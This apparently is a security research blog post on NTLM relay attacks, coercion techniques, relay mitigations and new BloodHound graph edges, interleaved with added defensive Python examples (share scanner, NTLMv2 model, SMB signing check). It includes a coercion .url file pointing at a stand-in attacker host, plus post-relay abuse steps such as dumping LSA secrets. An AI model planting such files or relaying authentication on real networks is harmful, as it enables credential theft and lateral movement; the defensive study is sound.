NTLM relay attacks have been around for a very long time. While many security practitioners assume NTLM relay is a solved problem, or at least not a severe one, it is, in fact, alive and kicking and arguably worse than ever before. Relay attacks are the easiest way to compromise domain-joined hosts these days, paving a path for lateral movement and privilege escalation.
NTLM relay attacks are more complicated than many people realize. There are many moving parts that operators need to track using different tools, but we have recently introduced NTLM relay edges into BloodHound to help you keep thinking in graphs, with new edges that represent coercion and relay attacks against domain-joined computers. They originate from Authenticated Users and lead into the computer that could be compromised via SMB, LDAP/LDAPS, and ADCS ESC8. Each of these edges consists of different components and prerequisites, but they all follow the same "Zero to Hero" pattern from Authenticated Users to the would-be compromised computer.
While there are many great resources on this old attack, I wanted to consolidate everything you need to know about NTLM into a single post, allowing it to be as long as needed, and I hope everyone will be able to learn something new.
Once Upon a Time
NTLM is a legacy authentication protocol that Microsoft introduced in 1993 as the successor to LAN Manager. NTLM actually stands for New Technology LAN Manager, a name that didn't age well. While Kerberos is the preferred authentication protocol in Active Directory environments (and beyond), NTLM is still widely used whenever Kerberos isn't viable or, more commonly, when NTLM usage is hard-coded.
NTLM Basics
My favorite research area is authentication protocols, and over the years, I've noticed that every authentication protocol is designed to thwart one or two major threats. For NTLM, I believe it's replay attacks. Not relay attacks (obviously, given the title), but replay attacks, where an attacker intercepts a valid authentication exchange and replays the packets/messages later to impersonate the victim. NTLM prevents such attacks using a challenge-response exchange: the server generates a random challenge, and the client produces a cryptographic response that proves possession of the client's credentials.
NTLM authentication is a three-message exchange:
- The Negotiate (type 1) message is sent from the client to the server to initiate authentication and negotiate session capabilities, such as a session key exchange and signing (more on these later), through a set of flags indicating the client's supported/preferred security attributes for the session.
- The Challenge (type 2) message is sent from the server to the client. It contains a corresponding set of flags indicating the server's supported/preferred session capabilities and an 8-byte randomly generated nonce, known as the server challenge.
- The Authenticate (type 3) message is sent from the client to the server. It contains a set of flags indicating the session capabilities settled on from the client's and server's preferences, and a cryptographically generated response to the server challenge. There are two major versions of the NTLM response generation algorithm: NTLMv1 and NTLMv2.
The server then validates the response to authenticate the client. Local accounts are validated against the NT hashes stored in the local SAM, and domain accounts are sent to a domain controller for validation via the Netlogon protocol.
NTLMv1
NTLMv1 is the original response algorithm. It was developed in 1993, in the unfortunate days when DES was the standard encryption algorithm, so that's what Microsoft used to generate the response, as described in the diagram below:
As shown above, the client's password is transformed into an NT hash, which is the MD4 hash of the Unicode-encoded password, to be used as the DES encryption key. However, there was a little hiccup: the NT hash is 16 bytes, whereas the effective DES key length is 7 bytes. Microsoft came up with a creative solution: split the NT hash into three keys, the first seven bytes, the following seven bytes, and the last two bytes padded with zeros. Each of the three keys independently encrypts the server challenge, and the three ciphertexts are concatenated to produce a 24-byte response.
NTLMv1 is Bad
NTLMv1 turned out to be a bad idea for three main reasons:
- First, DES encryption is… not great, as it can be cracked relatively easily.
- Second, the response isn't "salted", meaning that the same password and server-challenge combination always produces the same response, making it susceptible to rainbow table attacks.
- Third, combining the two previous reasons yields one of my all-time favorite attacks, discovered by Moxie Marlinspike and David Hulton. They managed to recover the raw NT hash by cracking each of the three ciphertexts individually, using rainbow tables and custom hardware. Why should we care about the NT hash? After all, it's not a password, right? We'll discuss the infamous Pass the Hash attack soon.
"NTLM2" Precedes NTLMv2
Just for completeness, I'll mention "NTLM2", also known as "NTLM2 Session Response" or "NTLMv1 with Extended Session Security". This interim version between NTLMv1 and NTLMv2 introduced an 8-byte client-generated nonce, known as the client challenge. The client challenge was concatenated with the server challenge, and then the combined value was MD5-hashed and, finally, DES-encrypted as in NTLMv1. This enhancement ensured every response was unique and thwarted rainbow table attacks. However, the algorithm is still fundamentally flawed, and the NT hash can be recovered with modern GPUs within less than 24 hours, on average, at a cost of about $30.
NTLM2 is just a distraction, though. Feel free to forget you ever read the paragraph above.
NTLMv2
Shortly after, still in the '90s, Microsoft introduced NTLMv2, replacing DES encryption with HMAC-MD5, as described below. This algorithm is still in use today.
The NT hash is used as the key to generate an HMAC of the client's domain name and username. It's called the "NT One Way Function v2" or NTOWFv2. The NTOWFv2 HMAC value is then used as the key to generate another HMAC, this time of the server challenge, along with additional information, such as a random client challenge and a timestamp to thwart rainbow table attacks, and additional session attributes, which we'll discuss later. This HMAC value is the NT Proof String or NTProofStr. Many people mistakenly assume that the NTProofStr is the NTLMv2 response, but it's only a part of it. All the additional information used to generate the NTProofStr is also included in the NTLMv2 response to allow the server to generate the same HMAC and validate the client's response.
LM Compatibility Level
Every Windows host acts as both a server, when someone authenticates to it, and a client, when it authenticates to another host. A single registry value controls both the server and client NTLM version support, located at HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel. It allows enabling/disabling NTLMv1 and NTLMv2 for the entire host as a server and as a client, as described in the table below:

| Value | Client NTLMv1 | Client NTLMv2 | Server NTLMv1 | Server NTLMv2 |
|-------|---------------|---------------|---------------|---------------|
| 0 | Enabled | Disabled | Enabled | Enabled |
| 1 | Enabled | Disabled | Enabled | Enabled |
| 2 | Enabled | Disabled | Enabled | Enabled |
| 3 * | Disabled | Enabled | Enabled | Enabled |
| 4 | Disabled | Enabled | Enabled | Enabled |
| 5 | Disabled | Enabled | Disabled | Enabled |

* Default as of Windows 2008/Vista

When a client authenticates to a member server using a domain account, the server sends the response to a DC for validation. Therefore, the DC's LmCompatibilityLevel is the one that determines whether NTLMv1 is accepted or not. Note that different DCs can technically have different configurations. However, it is extremely uncommon to see DCs with LmCompatibilityLevel set to 5 (I've never seen that outside of lab environments), so it's safe to assume the DC will support both NTLMv1 and NTLMv2, as a server, for domain accounts.
It isn't uncommon to see DCs with a lower LmCompatibilityLevel. I believe the reason is that some sysadmins mistakenly assume that a lower LmCompatibilityLevel is required to support NTLMv1 clients in the domain, whereas, in fact, it only enables NTLMv1 on the DCs as clients, which can have dire consequences, as we'll explain soon.
Looking at the table above, we can make a few observations:
- As a client, a Windows host can have either NTLMv1 or NTLMv2 enabled, but not both.
- As a server, a Windows host will likely enable both NTLMv1 and NTLMv2.
- If a Windows host enables NTLMv1 as a client, it must also enable it as a server.
- A Windows host doesn't have to enable NTLMv1 as a client to enable it as a server.
Additional settings allow restricting or auditing outgoing or incoming NTLM authentication or requiring session security settings, but we won't elaborate on these.
Password Cracking is a Problem
There are different tools for capturing NTLM responses for cracking. Responder is the most well-known and widely used tool, but Inveigh and Farmer deserve an honorable mention, too.
An attacker can potentially crack a captured NTLM exchange, whether it's NTLMv1 or NTLMv2, to recover the password if it isn't sufficiently strong. In the case of NTLMv1, the NT hash can always be recovered, and it can be abused in a couple of ways. If it is a computer/service account, the attacker can forge an RC4-encrypted Kerberos silver ticket and impersonate a privileged account to the host or the service. The NT hash can also be used for NTLM authentication, without cracking the cleartext password, through the infamous Pass the Hash attack.
Pass the Hash
When taking a closer look at the NTLMv1 and NTLMv2 flows, you may notice that, technically, we don't need the cleartext password to produce a valid NTLM response. If we skip the first step in the flow, the NT hash is all we need.
Who Needs to Crack Passwords Anyway?
The real problem with NTLM is relay attacks. An attacker can simply relay the NTLM messages between a client and a server, back and forth, until the server establishes a session for the client, allowing the attacker to perform any operation the client could perform on the server. For clarity, we'll refer to the client as the "victim" and the server as the "target".
Relay attacks allow authenticating as the victim to the target without spending time and resources on password cracking and without relying on weak passwords.
Not an Opportunistic Attack
Some defenders belittle relay attacks because they seem somewhat opportunistic. However, relay attacks can be executed with intention and precision when combined with authentication coercion attacks.
Generally, the mechanics of computer account authentication coercion and user account authentication coercion are different.
Computer Account Authentication Coercion
Computer account authentication coercion typically involves an RPC call to a vulnerable function on a remote host (the relay victim). Specifically, we'd try to call a function that would attempt to access an arbitrary path we can control. Then, when the remote service attempts to access the specified path, we'd require authentication and kick off a relay attack. The remote service would authenticate as the relay victim computer account if the service runs as SYSTEM or NETWORK SERVICE and if it doesn't impersonate a different context before attempting to access the resource.
The two most notable computer authentication coercion primitives are the Printer Bug and PetitPotam. The Printer Bug abuses the function RpcRemoteFindFirstPrinterChangeNotification[Ex] in the Print Spooler service, which establishes a connection to an arbitrary path to send notifications about print object status changes. PetitPotam abuses several functions in the Encrypting File System (EFS) service, such as EfsRpcOpenFileRaw, which opens a file at an arbitrary path for backup/restore. These methods result in an immediate authentication attempt from the victim computer account without user interaction.
Authenticated Users are permitted to trigger these computer account authentication coercion primitives, allowing almost anyone to initiate the relay attack.
User Account Authentication Coercion
User account authentication coercion is more complicated and, in some cases, somewhat opportunistic. The classic user account authentication coercion primitives involve planting a reference to an external resource in a document, an email, or even a web page. When the victim renders the document, the client attempts to load the resource, sometimes without the user's knowledge or consent, and initiates an authentication attempt with the user's credentials. These primitives require one to three clicks and can be sent directly to the victim or strategically planted in a high-traffic shared folder or website for a watering hole attack.
Dominic Chell highlighted a more sophisticated, well-known technique that abuses Windows Shell. Windows Shell is the operating system's user interface. It has extensions and handlers that enrich the user experience, for example, by generating thumbnails/previews or customizing icons. Specially crafted files can manipulate these mechanisms to access arbitrary paths as soon as the operating system "sees" them, without any user interaction. The most common way to abuse it is to pass the icon handler a reference to an attacker-controlled path, which results in a user authentication attempt as soon as the user browses the folder in which the file is located, even if the user never clicks or highlights the file. The most notable file types that support this kind of manipulation are:
- Windows Search Connectors (.searchConnector-ms)
- URL files (.url)
- Windows Shortcuts (.lnk)
- Windows Library Files (.library-ms)
For example, the following URL file would try to load its icon from the path \\attackerhost\icons\url.icon in the user's security context, so it authenticates with the user's credentials.

```ini
[InternetShortcut]
URL=attacker
WorkingDirectory=attacker
IconFile=\\attackerhost\icons\url.icon
IconIndex=1
```

Attackers can drop these files in strategic file shares, such as high-traffic file shares or those frequently used by privileged users, and then kick off a relay attack as soon as an authentication attempt comes through.
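Because these files trigger an authentication attempt merely by being listed in a folder, a practical defensive control is to hunt file shares for them. The following is an added Python example, not code from the original post or from BloodHound, that walks a directory tree (for instance a mounted share) and reports .url, .library-ms and .searchConnector-ms files whose icon or location fields point at a UNC path, including the WebDAV host@port form discussed later in the post. The sample files, host names and share layout are constructed for the demonstration; .lnk files are binary and are not parsed here.

```python
"""Hunt a share for shell-handled files whose icon/location fields point at a UNC path.
Added example; sample files below are constructed, not taken from a real environment."""
import configparser
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# UNC reference such as \\host\share\x.ico, or the WebDAV form \\host@80\share\x.ico
UNC_RE = re.compile(r"^\\\\[^\\/]+(?:@\d+)?\\")
# .url fields that Explorer resolves without the user opening the file
URL_FIELDS = ("IconFile", "URL", "WorkingDirectory")
# element names that .library-ms / .searchConnector-ms resolve the same way
XML_TAGS = ("iconReference", "url")


def _unc_host(unc: str) -> str:
    """Extract the host from \\host[@port]\share\... (lower-cased)."""
    return unc[2:].split("\\", 1)[0].split("@", 1)[0].lower()


def suspicious_refs_in_url_file(text: str) -> list:
    """Return (field, value) pairs in an .url file that reference a UNC path."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    refs = []
    if cp.has_section("InternetShortcut"):
        for field in URL_FIELDS:
            value = cp["InternetShortcut"].get(field, "")
            if UNC_RE.match(value):
                refs.append((field, value))
    return refs


def suspicious_refs_in_xml_file(text: str) -> list:
    """Return (element, value) pairs in a library/search-connector XML file that
    reference a UNC path. Namespaces are ignored by matching on the local tag name."""
    refs = []
    for elem in ET.fromstring(text).iter():
        local = elem.tag.rsplit("}", 1)[-1]
        value = (elem.text or "").strip()
        if local in XML_TAGS and UNC_RE.match(value):
            refs.append((local, value))
    return refs


def scan_share(root: str, trusted_hosts=()) -> dict:
    """Map each suspicious file path under root to its UNC references, skipping
    references to hosts listed in trusted_hosts (e.g. the organisation's own servers)."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = name.lower().rsplit(".", 1)[-1] if "." in name else ""
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
                if ext == "url":
                    refs = suspicious_refs_in_url_file(text)
                elif ext in ("library-ms", "searchconnector-ms"):
                    refs = suspicious_refs_in_xml_file(text)
                else:
                    continue
            except (configparser.Error, ET.ParseError, OSError):
                continue  # unreadable or malformed: not a shell-resolvable reference
            refs = [r for r in refs if _unc_host(r[1]) not in trusted]
            if refs:
                findings[path] = refs
    return findings


def demo() -> dict:
    """Build a constructed share with one planted .url, one benign .url and one
    planted .library-ms, then scan it. Returns {file name: [(field, unc), ...]}."""
    root = tempfile.mkdtemp()
    planted = ("[InternetShortcut]\nURL=\\\\example-host\\x\n"
               "IconFile=\\\\example-host@80\\icons\\url.icon\nIconIndex=1\n")
    benign = ("[InternetShortcut]\nURL=https://intranet.example\n"
              "IconFile=C:\\Windows\\System32\\shell32.dll\nIconIndex=1\n")
    lib = ('<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
           '<iconReference>\\\\example-host\\icons\\lib.ico</iconReference>'
           '</libraryDescription>')
    for fname, body in (("quarterly.url", planted), ("portal.url", benign),
                        ("docs.library-ms", lib)):
        with open(os.path.join(root, fname), "w", encoding="utf-8") as fh:
            fh.write(body)
    return {os.path.basename(p): refs for p, refs in scan_share(root).items()}


if __name__ == "__main__":
    for fname, refs in demo().items():
        print(fname, refs)
```

Run it against a mounted share (`scan_share("/mnt/share", trusted_hosts=["fileserver01"])`) to list candidate files; the hits point at the host that would receive the coerced authentication, which is also the indicator to correlate with NTLM audit logs.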
Credential Abuse Without Lateral Movement
Traditionally, when attackers gain admin access to a host with an interesting logged-on user, they'd move laterally to that host and then attempt one of many credential abuse techniques to impersonate the user and continue maneuvering toward their objectives. However, as EDRs and other endpoint security solutions improve, the detection risk of lateral movement and credential abuse TTPs increases.
Instead, attackers can reduce the detection risk by accessing the remote file system via an administrative share, such as C$, and dropping an authentication coercion file on the logged-on user's desktop. The moment the file is dropped, Windows Shell starts processing it, and an authentication attempt to the attacker-controlled host is initiated. It works even if the file is hidden, the workstation is locked, or the RDP session is disconnected. More specifically, it works as long as explorer.exe runs in a suitable security context, meaning it's associated with a logon session with credentials cached in the MSV1_0 authentication package.
The attacker can try to crack the NTLM response to recover the password or establish a session on a target server by relaying it.
Taking Over 445
In case you missed it, it's possible to bind a listener to port 445 on Windows hosts without loading a driver, loading a module into LSASS, or requiring a reboot of the Windows machine, as Nick Powers discovered last year.
Too Good to Be True?
So far, NTLM relay attacks may seem very powerful and somewhat simple. However, over the years, Microsoft introduced several mitigations to complicate things.
Session Security
NTLM supports signing (integrity) and sealing (encryption/confidentiality) to secure the session. This is achieved by exchanging a session key in the NTLM Authenticate message. The client generates a session key and RC4-encrypts it using a key derived, in part, from the client's NT hash. A common misconception is that when signing is negotiated, NTLM relay attacks fail to establish a session (authenticate). However, even with signing, authentication is successful. The problem is that the attacker can't recover the session key without possessing either the victim's NT hash or the target's credentials. But if the attacker possessed either of them, there would be no need for relaying anyway. Therefore, if the target indeed requires all the subsequent messages in the session to be signed with the session key, the attacker wouldn't be able to use the session. Fortunately for the attackers, not all servers enforce such a requirement, as we'll see soon.
The screenshot below shows a portion of a typical NTLM Authenticate message in which a session key is exchanged and signing is negotiated.
The premise of an NTLM relay attack is a man-in-the-middle position. Therefore, the attacker's obvious next step would be tampering with this Authenticate message in flight to remove the session key and reset the Negotiate Key Exchange and Negotiate Sign flags, pretending the victim never negotiated these.
Message Integrity Code (MIC)
Microsoft anticipated such attempts and introduced an integrity check to the NTLM messages. An HMAC is added to the Authenticate message to protect all three NTLM messages with the session key. The server validates the MIC upon receiving the message, and if a single bit in any of the three NTLM messages is flipped, authentication fails.
Drop the MIC?
The MIC is a later addition to the NTLM protocol. Windows XP and Windows Server 2003 and older, as well as some third-party platforms, don't support it. So, can't the attacker drop the MIC and pretend the client never added it?
Microsoft anticipated that, too, and added an attribute to the NTLMv2 response indicating the MIC's presence.
Therefore, an attacker would have to remove/reset that attribute before removing the MIC, but because this attribute is part of the NTLMv2 response, altering it would invalidate the NTProofStr, and authentication would fail.
Those of you who are paying attention should notice that NTLMv1 doesn't incorporate any additional information into the NTLMv1 response, meaning that NTLMv1 is always susceptible to MIC removal and tampering with the Negotiate flags and the session key.
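The NTLMv2 computation from the NTLMv2 section, the pass-the-hash observation, and the point just made about the MIC-presence attribute can all be seen in one small model of the protocol. The following is an added Python example, not code from the original post or from BloodHound/SharpHound, following the NTLMv2 response and verification steps of MS-NLMP section 3.3.2. It builds the NT hash, NTOWFv2, NTProofStr and the full NTLMv2 response; verifies the response server-side using only the stored NT hash; and shows that flipping the MsvAvFlags "MIC present" bit inside the response invalidates the NTProofStr. MD4 is implemented inline because many hashlib builds no longer ship it; the server challenge, client challenge, timestamp, account names and AV pairs are constructed test values, and `av_pairs` carries only a subset of the attributes a real client sends.

```python
"""Model of NTLMv2 response generation and verification (MS-NLMP 3.3.2).
Added example with constructed inputs; not production code."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _md4(data: bytes) -> bytes:
    """MD4 per RFC 1320. Included because hashlib on OpenSSL 3 often lacks MD4."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = rol((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            k = (i % 4) * 4 + i // 4
            a = rol((a + G(b, c, d) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = rol((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)). The cleartext is never needed again."""
    return _md4(password.encode("utf-16-le"))


def ntowfv2(nt: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) || domain))."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def av_pairs(domain: str, server: str, mic_present: bool) -> bytes:
    """Constructed subset of the AV_PAIR list (MS-NLMP 2.2.2.1): NetBIOS domain name,
    NetBIOS computer name, MsvAvFlags (0x02 = MIC present), MsvAvEOL."""
    pair = lambda av_id, value: struct.pack("<HH", av_id, len(value)) + value
    return (pair(0x0002, domain.encode("utf-16-le"))
            + pair(0x0001, server.encode("utf-16-le"))
            + pair(0x0006, struct.pack("<I", 0x02 if mic_present else 0x00))
            + pair(0x0000, b""))


def ntlmv2_response(nt, user, domain, server_challenge, client_challenge, timestamp, avs):
    """Client side: response = NTProofStr || temp, where temp = RespType(1) HiRespType(1)
    Reserved(6) TimeStamp(8) ClientChallenge(8) Reserved(4) AvPairs Reserved(4)."""
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + avs + b"\x00" * 4)
    nt_proof_str = hmac.new(ntowfv2(nt, user, domain), server_challenge + temp, hashlib.md5).digest()
    return nt_proof_str + temp


def verify_ntlmv2(nt, user, domain, server_challenge, response) -> bool:
    """Server side (what the DC does via Netlogon): recompute NTProofStr from the stored
    NT hash plus the attributes echoed in the response. Only the NT hash is needed, which
    is why pass the hash works; and any change to the echoed attributes breaks the HMAC."""
    nt_proof_str, temp = response[:16], response[16:]
    expected = hmac.new(ntowfv2(nt, user, domain), server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(nt_proof_str, expected)


def clear_mic_present_flag(response: bytes) -> bytes:
    """What the server would see if the MsvAvFlags attribute were altered in transit:
    the 0x02 bit is cleared inside the echoed AV pairs (which start at offset 44)."""
    idx = response.index(struct.pack("<HH", 0x0006, 4), 44) + 4
    flags = struct.unpack("<I", response[idx:idx + 4])[0] & ~0x02
    return response[:idx] + struct.pack("<I", flags) + response[idx + 4:]


def demo():
    """Returns (genuine response verifies, response with MIC flag cleared verifies)."""
    nt = nt_hash("Password")                    # constructed credential
    sc = bytes.fromhex("0123456789abcdef")      # constructed server challenge
    cc = bytes.fromhex("aaaaaaaaaaaaaaaa")      # constructed client challenge
    resp = ntlmv2_response(nt, "User", "Domain", sc, cc, 0, av_pairs("Domain", "Server", True))
    genuine = verify_ntlmv2(nt, "User", "Domain", sc, resp)
    altered = verify_ntlmv2(nt, "User", "Domain", sc, clear_mic_present_flag(resp))
    return genuine, altered


if __name__ == "__main__":
    print("genuine verifies, altered verifies:", demo())
```

Two responses to the same server challenge differ as soon as the client challenge or timestamp differs, which is the "salt" NTLMv1 lacks; and because `verify_ntlmv2` recomputes the HMAC over everything the client echoed, the server does not need a separate signal to notice that the MIC-presence flag was changed.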
A Blast From the Past
In 2019, Yaron Zinar and Marina Simakov discovered a couple of vulnerabilities in the NTLM implementation, allowing attackers to drop the MIC even in NTLMv2. However, we won't delve into these because Microsoft released patches, and it is extremely rare to encounter Windows hosts affected by these vulnerabilities nowadays.
Channel Binding
Channel binding, also commonly known as Extended Protection for Authentication (EPA), is a mechanism that prevents man-in-the-middle attacks by incorporating a token from the secure channel (TLS), that is, the server certificate hash, into the NTLM Authenticate message. The server can compare the channel binding token to its own certificate hash and reject the authentication attempt if there's a mismatch. Any service running over TLS, such as HTTPS and LDAPS, can support channel binding.
Just like session security and the MIC, channel binding is not mandatory, but it is part of the NTLMv2 response and is therefore protected by the NTProofStr, so the attacker can't remove it and pretend it was never there. However, NTLMv1 doesn't support channel binding.
Backward Compatibility
All these mitigations are later additions to the protocol, so some older or third-party platforms may not support them. Therefore, they may not be required by the target server. The server's behavior depends on its configuration, whether it's configured to support or even require session security or channel binding, and whether it's designed or implemented to honor the session capabilities negotiated in the NTLM exchange. Given that this is just about the midpoint of this post, you can assume it isn't uncommon for targets to not require or enforce these mitigations.
Protected Users
Microsoft introduced the Protected Users security group in the Windows Server 2012R2 functional level to mitigate several attacks that can lead to credential material theft. Members of this group are not permitted to perform NTLM authentication, and hosts running Windows Server 2012R2/Windows 8.1 or later don't cache the NT hash in LSA memory. These protections and others may have usability issues, so only privileged/sensitive accounts should be added to this group. Unfortunately, this group is too often left empty.
Not Too Good to Be True
Given everything discussed above, what are the conditions for relay attacks?
A relay attack should be viable if the target doesn't support these mitigations by design/implementation or configuration (disabled), or the target supports these mitigations (enabled) but doesn't require them, and one of the following applies:
- The victim doesn't negotiate session security and channel binding
- The victim's session negotiation is unprotected (NTLMv1)
- The target implementation ignores the negotiated capabilities
Relaying is only half the story, though. A successful relay satisfies authentication and establishes a session. However, authorization, meaning what the attacker can do afterward, depends on the victim's permissions.
Targeting SMB
The first and simplest scenario we introduced into BloodHound is relaying NTLM to SMB. SMB servers don't support channel binding with NTLM, and they negotiate signing at the SMB protocol level, outside the NTLM exchange, meaning that even if the victim negotiates signing in the NTLM Authenticate message, the target will disregard it and only consider what's negotiated in the SMB headers, which the attacker can control. To be clear, configuring SMB clients to require SMB signing doesn't affect NTLM relay attacks.
Below is an excerpt from a typical SMB2 negotiate response message with SMB signing enabled but not required. The server is vulnerable to relay attacks if the signing required bit is not set.
Domain controllers starting with Windows Server 2008 and all Windows hosts starting with Windows Server 2025 and Windows 11 require SMB signing by default. In practice, this means that nowadays, most Windows hosts out there, especially Windows servers, don't require SMB signing by default. Unfortunately, many organizations don't change these defaults out of an unjustified fear of breaking backward compatibility or a myth about performance impact.
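The signing-required bit referred to above lives in the SecurityMode field of the SMB2 NEGOTIATE response, and checking it is exactly the unauthenticated test SharpHound performs for the SMB signing status described below. The following is an added Python example, not code from the original post or from SharpHound, that parses that response and reports whether the server would accept an unsigned session. Field offsets follow MS-SMB2 sections 2.2.1.2 and 2.2.4; the response bytes are constructed here rather than captured, and the builder is only there to produce test input.

```python
"""Parse an SMB2 NEGOTIATE response and report the server's signing policy.
Added example; the packet bytes are constructed, not captured from a real host."""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SIGNING_ENABLED = 0x0001    # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002   # SMB2_NEGOTIATE_SIGNING_REQUIRED

# SMB2 header (64 bytes): ProtocolId, StructureSize, CreditCharge, Status, Command,
# Credits, Flags, NextCommand, MessageId, Reserved, TreeId, SessionId, Signature
HEADER_FMT = "<4sHHIHHIIQIIQ16s"
# NEGOTIATE response fixed part (64 bytes): StructureSize, SecurityMode, DialectRevision,
# NegotiateContextCount, ServerGuid, Capabilities, MaxTransactSize, MaxReadSize,
# MaxWriteSize, SystemTime, ServerStartTime, SecurityBufferOffset, SecurityBufferLength,
# NegotiateContextOffset
BODY_FMT = "<HHHH16sIIIIQQHHI"


def parse_negotiate_response(packet: bytes) -> dict:
    """Return dialect and signing flags from a server NEGOTIATE response."""
    if len(packet) < 128 or packet[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 packet")
    command = struct.unpack_from("<H", packet, 12)[0]
    flags = struct.unpack_from("<I", packet, 16)[0]
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a server NEGOTIATE response")
    structure_size, security_mode, dialect = struct.unpack_from("<HHH", packet, 64)
    if structure_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {
        "dialect": dialect,
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }


def relay_target_exposed(packet: bytes) -> bool:
    """True when the server does not require signing, i.e. a relayed NTLM session to
    this SMB server could be used even though the relay never learns the session key."""
    return not parse_negotiate_response(packet)["signing_required"]


def build_negotiate_response(security_mode: int, dialect: int = 0x0311) -> bytes:
    """Constructed SMB2 NEGOTIATE response with no negotiate contexts and an empty
    security buffer; used only to produce sample input for the parser."""
    header = struct.pack(HEADER_FMT, SMB2_MAGIC, 64, 0, 0, SMB2_NEGOTIATE, 1,
                         SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, b"\x00" * 16)
    body = struct.pack(BODY_FMT, 65, security_mode, dialect, 0, b"\x11" * 16,
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return header + body + b"\x00"  # 1-byte Buffer keeps StructureSize at 65


if __name__ == "__main__":
    for mode, label in ((SIGNING_ENABLED, "enabled, not required"),
                        (SIGNING_ENABLED | SIGNING_REQUIRED, "required")):
        pkt = build_negotiate_response(mode)
        print(label, parse_negotiate_response(pkt), "exposed:", relay_target_exposed(pkt))
```

Only the SMB2/3 dialects are handled; a host that still answers with SMB1 (`\xffSMB`) needs a separate check and is a finding in its own right.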
Introducing the CoerceAndRelayNTLMToSMB Edge
The new CoerceAndRelayNTLMToSMB edge is the simplest of the new NTLM relay edges. The edge always comes out of the Authenticated Users node and leads into the target computer node. It represents a combination of computer account authentication coercion against the relay victim and an NTLM relay attack against the relay target.
Collection
SharpHound collects all the required information as follows:
- SMB signing status collection doesn't require authentication. It's collected from the relay target by actively establishing a connection to the host over SMB and parsing the SMB negotiation response messages.
- Local admin rights are collected from the relay target. They can be collected from the host directly over RPC, which may or may not require admin rights, depending on the OS version and configuration, or from the DC via GPO analysis.
- Outgoing NTLM restriction is collected from the relay victim via WMI or Remote Registry, which requires admin rights.
Edge Creation
BloodHound creates the edge if the following criteria are met:
- SMB signing on the target computer is not required (this is the relay target). The edge won't be created if the SMB signing status was not collected/ingested into BloodHound.
- At least one computer account in the environment has local admin access to the target computer (this is the relay victim).
- There is no outgoing NTLM restriction on the victim host. In BloodHound Community Edition, if this data wasn't collected/ingested, it is assumed to be false (not restricted), as per the default configuration. In BloodHound Enterprise, this assumption is not made, and the edge won't be created.
- If the domain functional level is Windows Server 2012R2, the relay victim must not be a member of the Protected Users group.
The edge is always created from Authenticated Users to the computer node representing the relay target.
Expanding the Coercion Targets accordion lists the relay victims, and expanding the Composition view shows a visual representation.
Abuse
An attacker can traverse this edge to gain access to the C$ or ADMIN$ share on the relay target, dump LSA secrets via Remote Registry, including the computer account password, or move laterally via the Service Control Manager.
A very common scenario captured by this new edge is SCCM TAKEOVER 2: coercing authentication from the SCCM site server and relaying it to the SCCM database server to take over the entire hierarchy.
SMB-Specific Limitations
The CoerceAndRelayNTLMToSMB edge only covers scenarios in which a computer (victim) has admin access to another computer (target) that doesn't require SMB signing. It doesn't cover user accounts as the relay victim, and it doesn't cover access to resources that a relay victim might be able to reach via SMB without admin rights, such as non-administrative file shares.
Other limitations that apply to all new NTLM relay edges will be discussed later.
Targeting ADCS (ESC8)
The new CoerceAndRelayNTLMToADCS edge is much more complicated than relaying to SMB because certificate abuse has a lot of requirements. However, the relaying logic is still relatively simple. Relaying to ADCS web enrollment allows obtaining a certificate for the relay victim and using it for authentication to impersonate the victim. This is the infamous ADCS ESC8 that Will Schroeder and Lee Chagolla-Christensen disclosed in their Certified Pre-Owned white paper.
